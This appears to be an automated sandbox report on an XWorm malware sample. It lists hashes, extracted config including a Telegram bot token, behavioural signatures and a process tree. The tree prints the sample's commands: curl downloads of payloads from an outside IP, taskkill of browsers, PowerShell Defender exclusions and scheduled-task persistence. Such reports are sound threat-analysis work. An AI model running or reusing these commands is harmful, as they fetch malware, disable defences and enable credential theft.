Analysis
-
max time kernel: 133s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-05-2024 21:34
Static task: static1
Behavioral task: behavioral1
Sample: 2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe
Resource: win7-20240508-en
General
-
Target: 2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe
Size: 87KB
MD5: ab378d6539627c52dbfc272c83eb420c
SHA1: 039060f0fdefbe0a62147a7bbad9b1a526a78d61
SHA256: 2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2
SHA512: afe3be5f89ad67e2c4440d44c6ed890853eecb6cf34faed20d61ae49f30fa30a5cc390393b3ef4609a34a2121b6831cacf00ee6aa62c268e0b9fce0223bb0222
SSDEEP: 1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfNxFOy:Hq6+ouCpk2mpcWJ0r+QNTBfNZ
Malware Config
-
Extracted family: xworm
Install_directory: %ProgramData%
install_file: winlogon.exe
pastebin_url: https://pastebin.com/raw/kTrgfRNT
telegram: https://api.telegram.org/bot6820329388:AAG0ljIyZ1Cj86n9cgzLGNBMldBe9TtqhAM/sendMessage?chat_id=1330099235
Signatures
-
Detect Xworm Payload 4 IoCs
Processes (resource: yara_rule):
  C:\Users\Admin\AppData\Local\Temp\rm.exe: family_xworm
  behavioral2/memory/4084-25-0x0000000000A00000-0x0000000000A16000-memory.dmp: family_xworm
  C:\Users\Admin\AppData\Local\Temp\wlms.exe: family_xworm
  behavioral2/memory/3112-29-0x0000000000B00000-0x0000000000B16000-memory.dmp: family_xworm
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes (pid process):
  3600 powershell.exe
  1144 powershell.exe
  4716 powershell.exe
  2984 powershell.exe
  2492 powershell.exe
  1472 powershell.exe
  1408 powershell.exe
  4500 powershell.exe
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (description: ioc (process)):
  Key value queried: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (grabber.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (rm.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (wlms.exe)
-
Executes dropped EXE 8 IoCs
Processes (pid process):
  4964 grabber.exe
  1300 ram.exe
  4084 rm.exe
  3112 wlms.exe
  2484 wlms.exe
  4352 winlogon.exe
  1752 wlms.exe
  468 winlogon.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes (description: ioc (process)):
  Set value (str): \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "C:\\ProgramData\\winlogon.exe" (rm.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wlms = "C:\\Users\\Admin\\AppData\\Roaming\\wlms.exe" (wlms.exe)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow: ioc):
  33: ip-api.com
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid process):
  4752 schtasks.exe
  4368 schtasks.exe
-
Kills process with taskkill 15 IoCs
Processes (pid process):
  1228 taskkill.exe
  4500 taskkill.exe
  2184 taskkill.exe
  3636 taskkill.exe
  1852 taskkill.exe
  1376 taskkill.exe
  468 taskkill.exe
  1380 taskkill.exe
  2576 taskkill.exe
  1864 taskkill.exe
  2356 taskkill.exe
  4660 taskkill.exe
  1680 taskkill.exe
  4428 taskkill.exe
  2124 taskkill.exe
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes (pid process, one entry per observation):
  2492 powershell.exe, 2492 powershell.exe, 2492 powershell.exe,
  1472 powershell.exe, 1472 powershell.exe, 1472 powershell.exe,
  1408 powershell.exe, 1408 powershell.exe,
  4500 powershell.exe, 4500 powershell.exe, 4500 powershell.exe,
  1408 powershell.exe,
  3600 powershell.exe, 3600 powershell.exe,
  1144 powershell.exe, 1144 powershell.exe,
  3600 powershell.exe, 1144 powershell.exe,
  4716 powershell.exe, 4716 powershell.exe,
  2984 powershell.exe, 2984 powershell.exe,
  4716 powershell.exe, 2984 powershell.exe,
  3112 wlms.exe,
  4084 rm.exe
-
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes (description: pid process), all entries Token: SeDebugPrivilege:
  1680 taskkill.exe, 1380 taskkill.exe, 4428 taskkill.exe, 2576 taskkill.exe, 2124 taskkill.exe,
  1852 taskkill.exe, 4500 taskkill.exe, 2184 taskkill.exe, 2356 taskkill.exe, 1864 taskkill.exe,
  3636 taskkill.exe, 1228 taskkill.exe, 1376 taskkill.exe, 4660 taskkill.exe, 468 taskkill.exe,
  4084 rm.exe, 3112 wlms.exe,
  2492 powershell.exe, 1472 powershell.exe, 1408 powershell.exe, 4500 powershell.exe,
  3600 powershell.exe, 1144 powershell.exe, 4716 powershell.exe, 2984 powershell.exe,
  4084 rm.exe, 4352 winlogon.exe, 2484 wlms.exe, 468 winlogon.exe, 1752 wlms.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes (pid process):
  3112 wlms.exe
  4084 rm.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (description: pid process -> target pid target process). Each write below is recorded twice in the report, giving the 64 IoCs:
  PID 2672 2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe wrote to memory of 3156 cmd.exe
  PID 3156 cmd.exe wrote to memory of 4000 curl.exe
  PID 3156 cmd.exe wrote to memory of 4656 curl.exe
  PID 3156 cmd.exe wrote to memory of 4964 grabber.exe
  PID 4964 grabber.exe wrote to memory of 4704 cmd.exe
  PID 4704 cmd.exe wrote to memory of 4024 curl.exe
  PID 4704 cmd.exe wrote to memory of 4368 curl.exe
  PID 4704 cmd.exe wrote to memory of 1300 ram.exe
  PID 1300 ram.exe wrote to memory of 1680 taskkill.exe
  PID 1300 ram.exe wrote to memory of 1380 taskkill.exe
  PID 1300 ram.exe wrote to memory of 4428 taskkill.exe
  PID 1300 ram.exe wrote to memory of 2576 taskkill.exe
  PID 1300 ram.exe wrote to memory of 2124 taskkill.exe
  PID 1300 ram.exe wrote to memory of 1852 taskkill.exe
  PID 1300 ram.exe wrote to memory of 4500 taskkill.exe
  PID 1300 ram.exe wrote to memory of 2184 taskkill.exe
  PID 1300 ram.exe wrote to memory of 2356 taskkill.exe
  PID 1300 ram.exe wrote to memory of 1864 taskkill.exe
  PID 1300 ram.exe wrote to memory of 3636 taskkill.exe
  PID 1300 ram.exe wrote to memory of 1228 taskkill.exe
  PID 1300 ram.exe wrote to memory of 1376 taskkill.exe
  PID 1300 ram.exe wrote to memory of 4660 taskkill.exe
  PID 1300 ram.exe wrote to memory of 468 taskkill.exe
  PID 4704 cmd.exe wrote to memory of 4084 rm.exe
  PID 3156 cmd.exe wrote to memory of 3112 wlms.exe
  PID 4084 rm.exe wrote to memory of 1472 powershell.exe
  PID 3112 wlms.exe wrote to memory of 2492 powershell.exe
  PID 4084 rm.exe wrote to memory of 4500 powershell.exe
  PID 3112 wlms.exe wrote to memory of 1408 powershell.exe
  PID 4084 rm.exe wrote to memory of 3600 powershell.exe
  PID 3112 wlms.exe wrote to memory of 1144 powershell.exe
  PID 4084 rm.exe wrote to memory of 4716 powershell.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
Process tree (depth in brackets, image path, PID, command line, triggered signatures):

[1] C:\Users\Admin\AppData\Local\Temp\2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe  (PID 2672)
    command line: "C:\Users\Admin\AppData\Local\Temp\2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\cmd.exe  (PID 3156)
      command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\49CA.tmp\49CB.tmp\49CC.bat C:\Users\Admin\AppData\Local\Temp\2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\curl.exe  (PID 4000)
        command line: curl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"
    [3] C:\Windows\system32\curl.exe  (PID 4656)
        command line: curl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"
    [3] C:\Users\Admin\AppData\Local\Temp\grabber.exe  (PID 4964)
        command line: grabber.exe
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe  (PID 4704)
          command line: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\513D.tmp\513E.tmp\513F.bat C:\Users\Admin\AppData\Local\Temp\grabber.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\curl.exe  (PID 4024)
            command line: curl -s -o ram.exe http://188.212.100.57:54391/download/shell.exe
        [5] C:\Windows\system32\curl.exe  (PID 4368)
            command line: curl -s -o rm.exe http://188.212.100.57:54391/download/winlogon.exe
        [5] C:\Users\Admin\AppData\Local\Temp\ram.exe  (PID 1300)
            command line: ram.exe
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\taskkill.exe  (PID 1680)
              command line: taskkill /F /IM chrome.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 1380)
              command line: taskkill /F /IM firefox.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 4428)
              command line: taskkill /F /IM brave.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 2576)
              command line: taskkill /F /IM opera.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 2124)
              command line: taskkill /F /IM kometa.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 1852)
              command line: taskkill /F /IM orbitum.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 4500)
              command line: taskkill /F /IM centbrowser.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 2184)
              command line: taskkill /F /IM 7star.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 2356)
              command line: taskkill /F /IM sputnik.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 1864)
              command line: taskkill /F /IM vivaldi.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 3636)
              command line: taskkill /F /IM epicprivacybrowser.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 1228)
              command line: taskkill /F /IM msedge.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 1376)
              command line: taskkill /F /IM uran.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 4660)
              command line: taskkill /F /IM yandex.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\system32\taskkill.exe  (PID 468)
              command line: taskkill /F /IM iridium.exe /T
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\rm.exe  (PID 4084)
            command line: rm.exe
            - Checks computer location settings
            - Executes dropped EXE
            - Adds Run key to start application
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1472)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rm.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4500)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rm.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3600)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4716)
              command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\System32\schtasks.exe  (PID 4752)
              command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"
              - Creates scheduled task(s)
    [3] C:\Users\Admin\AppData\Local\Temp\wlms.exe  (PID 3112)
        command line: wlms.exe
        - Checks computer location settings
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2492)
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wlms.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1408)
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlms.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1144)
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\wlms.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2984)
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlms.exe'
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\schtasks.exe  (PID 4368)
          command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wlms" /tr "C:\Users\Admin\AppData\Roaming\wlms.exe"
          - Creates scheduled task(s)
-
[1] C:\Users\Admin\AppData\Roaming\wlms.exe  (PID 2484)
    command line: C:\Users\Admin\AppData\Roaming\wlms.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
-
[1] C:\ProgramData\winlogon.exe  (PID 4352)
    command line: C:\ProgramData\winlogon.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
-
[1] C:\Users\Admin\AppData\Roaming\wlms.exe  (PID 1752)
    command line: C:\Users\Admin\AppData\Roaming\wlms.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
-
[1] C:\ProgramData\winlogon.exe  (PID 468)
    command line: C:\ProgramData\winlogon.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Dropped and written files (path, size):
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  (2KB)
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wlms.exe.log  (654B)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  (944B; four distinct files were recorded under this path)
C:\Users\Admin\AppData\Local\Temp\49CA.tmp\49CB.tmp\49CC.bat  (202B)
C:\Users\Admin\AppData\Local\Temp\513D.tmp\513E.tmp\513F.bat  (230B)
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ct0s3akk.bvx.ps1  (60B)
C:\Users\Admin\AppData\Local\Temp\cards.json  (4B)
C:\Users\Admin\AppData\Local\Temp\grabber.exe  (120KB)
C:\Users\Admin\AppData\Local\Temp\ram.exe  (7.6MB)
C:\Users\Admin\AppData\Local\Temp\rm.exe  (64KB)
C:\Users\Admin\AppData\Local\Temp\wlms.exe  (63KB)
-
Memory dumps (region, size):
memory/1300-21-0x00007FF7211E0000-0x00007FF721A13000-memory.dmp  (8.2MB)
memory/2492-35-0x00000275D5BF0000-0x00000275D5C12000-memory.dmp  (136KB)
memory/3112-29-0x0000000000B00000-0x0000000000B16000-memory.dmp  (88KB)
memory/4084-25-0x0000000000A00000-0x0000000000A16000-memory.dmp  (88KB)